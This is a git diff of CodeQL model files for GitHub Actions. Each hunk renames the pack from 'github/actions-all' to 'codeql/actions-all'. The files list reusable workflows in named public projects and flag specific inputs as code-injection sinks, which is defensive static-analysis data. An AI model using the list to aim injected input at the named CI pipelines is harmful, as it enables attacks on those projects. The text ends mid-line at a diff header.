diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index f1c6ec345d1..962623cd913 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 2cfa8a46c83..99ce22f3f64 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index 8c3c5a58502..e52acbad13c 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index aa75ce39295..989f9aae937 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index e9dd33c6f17..e34a4b3910b 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index a0bd22ad352..9a1991ddc81 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index fb98c6a7d9b..0316d82a5e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 0c108422a94..16d8ba2b926 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index c820724bd71..1a59c9bf160 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index 51d32bde4ba..fb13f2451d9 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index b747a4a27df..ac92d435f74 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index c5c26bc7926..278801efa2d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index 62a1a853937..f426656c076 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index b6c0c1b5e64..17d1c687f62 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 005db8e9ddc..4a8e4cc4378 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index a1090c45ae0..80333528952 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 051aacfeee0..b1a056e2836 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 1fb380a3a72..906eb810c89 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index a8b8234e1fc..75469b1a80a 100644 
--- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 108bbad1c07..192f1d690b5 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 42ed67f3d20..d8f7648e808 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index a664d6063e3..9789709eac7 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6270ab5842e..60e388c076b 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 0c4d975e012..2cdfb52d976 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 64fc3792659..1aae8bd0fd4 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index f48be6693d0..c157f1bbca1 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index f2ebae0b0ea..c7e2c60b08e 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index ec591db22ac..fa0afdae769 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 06fdea3f8a2..11a756cc063 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index b864551b3fb..748d28d7545 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index fdb499a81dc..5916205cea9 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "input.pr-number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml index c831a5d6d8f..b62e5e5599f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml index d9d4e9bd2fa..6f841faecce 100644 --- a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "input.mage-targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml index 4091c74dee5..3c986e3d00b 100644 --- a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "input.deploy_path", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml index 1c6d8804d6d..32de8a5131d 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "input.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml index f94c87537cf..a28e8e121d2 100644 --- a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "input.ddtrace-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml index efb8e467a0a..ed8f60f413e 100644 --- a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "input.run_id", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml index 8a7b36e365c..476d40b5206 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml index 0d6fb59ed50..c8a534d031d 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "input.nightly_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml index 74bdb5ab280..5d3b6e2a884 100644 --- a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "input.s3_bucket_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml index 038fd953d6e..b402ab78ef5 100644 
--- a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["decidim/decidim/.github/workflows/test_app.yml", "*", "input.test_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml index 0c185f4cbd5..2abf8ff1d32 100644 --- a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "input.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml index 44e89b4e251..4183d01143f 100644 --- a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "input.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml index 6b4feeedf62..eebeabb0353 100644 
--- a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "input.test-script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml index 43e99341717..7279ad6d976 100644 --- a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml index cc5fb5c8d57..ccd29346a10 100644 --- a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["docker/build-push-action/.github/workflows/.e2e-run.yml", "*", "input.id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml index 64ca7805d90..0d162f9c66b 100644 --- a/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/dragonwell-project_dragonwell11.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["dragonwell-project/dragonwell11/.github/workflows/test.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml index eab60f25238..730a0fc622d 100644 --- a/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/earthly_earthly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["earthly/earthly/.github/workflows/reusable-wait-block-target.yml", "*", "input.BINARY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml index fc91813e01b..7c74a66467b 100644 --- a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vert.x.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["eclipse-vertx/vert.x/.github/workflows/ci.yml", "*", "input.profile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/eclipse-vertx_vertx-sql-client.model.yml 